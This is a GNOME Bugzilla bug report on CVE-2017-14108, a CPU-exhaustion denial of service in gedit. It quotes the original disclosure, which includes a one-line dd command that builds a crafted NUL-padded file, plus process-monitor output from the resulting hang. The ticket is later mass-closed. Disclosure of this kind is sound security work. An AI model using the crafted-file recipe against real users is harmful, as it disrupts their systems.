Bug 791037 – libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.

After an evaluation, GNOME has moved from Bugzilla to GitLab. Learn more about GitLab.
No new issues can be reported in GNOME Bugzilla anymore.
To report an issue in a GNOME project, go to GNOME GitLab.
Do not go to GNOME Gitlab for: Bluefish, Doxygen, GnuCash, GStreamer, java-gnome, LDTP, NetworkManager, Tomboy.

Bug 791037 - libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.


Summary:	libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a d...


Status:	RESOLVED OBSOLETE

Product:	gedit
Classification:	Applications
Component:	file loading and saving
Version:	git master
Hardware:	Other Linux

Importance:	Normal major
Target Milestone:	---
Assigned To:	Gedit maintainers
QA Contact:	Gedit maintainers

URL:
Whiteboard:

Depends on:
Blocks:

Reported:	2017-11-30 18:00 UTC by Marcos Simental
Modified:	2020-11-24 09:57 UTC

See Also:
GNOME target:	---
GNOME version:	---

Description Marcos Simental 2017-11-30 18:00:01 UTC

Original report from Hosein Askari (raw report below)
https://cxsecurity.com/issue/WLB-2017090008
CVE report: https://nvd.nist.gov/vuln/detail/CVE-2017-14108
################
#Title: libgedit.a mishandling NUL Blocks in gedit(GNOME text editor)  
#CWE: CWE-400
#CVE: CVE-2017-14108
#Exploit Author: Hosein Askari 
#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit
#Version : All Version (3.22.1 and older version)
#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
#Date: 01-09-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.
###############
sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt
################
POC:
constantine@constantine:~$ pidstat -h -r -u -v -p 3107
Linux 4.4.0-93-generic (constantine) 	۱۷/۰۹/۰۱ 	_i686_	(2 CPU)

#      Time   UID       PID    %usr %system  %guest   %wait    %CPU   CPU  minflt/s  majflt/s     VSZ     RSS   %MEM threads   fd-nr  Command
 1504280041  1000      3107   16.43    0.01    0.00    0.03   106.44     1     15.53      0.00  121296   38804   0.95       4      18  gedit

constantine@constantine:~$ top
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                              
 3107 constan+  20   0  128884  38492  28320 R 106.7  0.9   0:17.76 gedit 
################

Comment 1 Sébastien Wilmet 2020-11-24 09:57:17 UTC

Mass-closing of all gedit bugzilla tickets.

Special "code" to find again all those gedit bugzilla tickets that were open before the mass-closing:

2bfe1b0590a78457e1f1a6a90fb975f5878cb60064ccfe1d7db76ca0da52f0f3

By searching the above sha256sum in bugzilla, the gedit contributors can find again the tickets. We may be interested to do so when we work on a specific area of the code, to at least know the known problems and possible enhancements.

We do this mass-closing because bugzilla.gnome.org is being replaced by gitlab.gnome.org.